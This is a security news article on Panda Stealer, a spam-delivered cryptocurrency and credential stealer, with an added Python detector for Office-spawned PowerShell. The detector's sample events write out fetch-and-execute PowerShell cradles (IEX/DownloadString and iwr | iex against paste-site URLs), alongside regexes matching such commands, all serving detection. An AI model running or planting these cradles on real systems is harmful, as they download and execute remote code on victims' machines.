
Trend Micro researchers have discovered a new variant of a cryptocurrency-stealing information stealer that uses a fileless approach in its global spam distribution campaign to evade detection. Dubbed Panda Stealer, the malware has been found targeting people in countries including the US, Australia, Japan and Germany, Trend Micro said this week.

Spam emails pose as commercial quote requests to entice victims into opening booby-trapped Excel files. Researchers found 264 files similar to Panda Stealer on VirusTotal, some of which were shared by threat actors on Discord. That is not surprising given recent trends: Cisco's Talos team recently found that threat actors have been abusing workflow and collaboration tools like Slack and Discord to bypass security controls and deliver information stealers, remote access trojans (RATs) and other malware.

Trend Micro identified two infection chains. One uses an .XLSM attachment containing macros that drop a loader, which then downloads and executes the main stealer. The second involves an attached .XLS file containing an Excel formula (rather than a VBA macro) that runs a PowerShell command to fetch content from paste.ee, a Pastebin alternative, which in turn retrieves a second, encrypted PowerShell command.

Panda Stealer's infection chain uses the same fileless distribution method as the "Fair" variant of the Phobos ransomware: the payload is loaded and executed in memory rather than written to disk, which makes it harder for file-based security tools to detect.
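Because the payload never lands on disk in this chain, file scanning alone will not catch it. What does remain visible is the process lineage described above: Excel spawning PowerShell (directly, or via cmd.exe) with a download cradle that pulls its next stage from a paste site. The following is an added example, not code from Trend Micro's report or from the malware itself, that scores constructed process-creation events along those lines. The domain watch-list, the regexes and the sample command lines are assumptions chosen for illustration; only paste.ee itself is named in the report.

```python
"""Added example: flag Office-spawned PowerShell download cradles in process-creation telemetry.
Not from Trend Micro's report; the watch-list, patterns and sample events are constructed."""
import base64
import re
from dataclasses import dataclass

# Assumed sets: Office parents and script hosts a practitioner would typically watch.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Hypothetical watch-list; paste.ee is the only host the report names.
PASTE_HOSTS = ("paste.ee", "pastebin.com", "cdn.discordapp.com")
# Common PowerShell download-cradle primitives (assumed list, not exhaustive).
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|net\.webclient)",
    re.I,
)
# -EncodedCommand and its short aliases, followed by a base64 blob.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(ev):
    """Return the list of reasons an event is suspicious; an empty list means nothing matched."""
    reasons = []
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    child = ev.image.rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS and child in SHELLS:
        reasons.append(f"office_spawned_shell:{parent}->{child}")
    text = ev.command_line
    decoded = decode_encoded_command(text)
    if decoded:
        # Inspect the decoded script too, so encoding does not hide the cradle.
        reasons.append("encoded_powershell")
        text = text + " " + decoded
    if CRADLE_RE.search(text):
        reasons.append("download_cradle")
    for host in PASTE_HOSTS:
        if host in text.lower():
            reasons.append(f"paste_host:{host}")
    return reasons


def scan(events):
    """Return (index, reasons) for every event that produced at least one reason."""
    return [(i, r) for i, ev in enumerate(events) if (r := analyze(ev))]


# Constructed sample events (URLs and paths are placeholders, not real indicators).
_STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('https://paste.ee/r/example')"
_ENC = base64.b64encode(_STAGE1.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -EncodedCommand " + _ENC),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Process"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c powershell -nop -w hidden -c "iwr https://pastebin.com/raw/abc | iex"'),
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(idx, reasons)
```

The lineage check (Office parent, script-host child) is the part that survives the fileless trick, since it comes from the kernel's process-creation event rather than from anything on disk; the cradle and paste-host checks only add confidence. Decoding `-EncodedCommand` before matching matters because the first stage in this chain is otherwise just an opaque base64 blob on the command line.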

Once installed, Panda Stealer looks for private keys and addresses associated with funded cryptocurrency wallets, including Ethereum (ETH), Litecoin (LTC), Bytecoin (BCN) and Dash (DASH). It can also take screenshots, exfiltrate system data and steal browser cookies as well as credentials for NordVPN, Telegram, Discord and Steam accounts.

While the campaign has not been attributed to a specific threat actor, Trend Micro says that examining the malware's active command-and-control (C2) servers led the team to IP addresses and a virtual private server (VPS) rented from Shock Hosting. The server has since been suspended.

See also:
Cryptocurrencies security is a growing problem
Babuk Locker – The First Ransomware of 2021

